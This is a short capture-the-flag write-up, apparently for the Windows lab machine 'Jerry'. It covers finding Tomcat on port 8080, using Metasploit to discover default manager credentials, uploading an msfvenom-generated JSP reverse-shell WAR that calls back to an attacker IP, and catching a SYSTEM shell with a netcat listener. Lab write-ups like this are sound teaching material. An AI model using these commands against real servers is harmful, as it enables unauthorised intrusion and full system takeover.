Jerry

A simple Windows box with weak tomcat credentials.

This box can be found HERE.

Nmap

nmap -p- -Pn $IP --min-rate=5000
initial nmap results
PORT     STATE SERVICE
8080/tcp open  http-proxy

Initial nmap scan reveals that port 8080 is open. Let's take a look.

home page

It looks like we have tomcat installed. Let's check out the /manager page.

manager page

We need to authenticate, let's see if we have some default credentials here. I'll use a Metasploit module (search "tomcat login" to find it) to find this out.

using metasploit

Let's fill the RHOST option and run the module.

credentials found

We indeed have some default credentials! Let's login and see what we have.

manager page

It seems we can upload a .war file here. I'll use msfvenom to generate a reverse shell that we can use to connect to the machine.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f war -o shell.war

Once the .war file generated, we can upload it to the site.

shell uploaded

Now, all we have to do is open a terminal on our machine and nc -lnvp 4444. Then, access the endpoint where our shell is located and we should have a shell!

we have a shell!

We now have a shell as SYSTEM on the machine! All that's left is finding the flags.

flags found

And we have both flags located in the Administrator's Desktop! 🚩🚩

PreviousLame

Last updated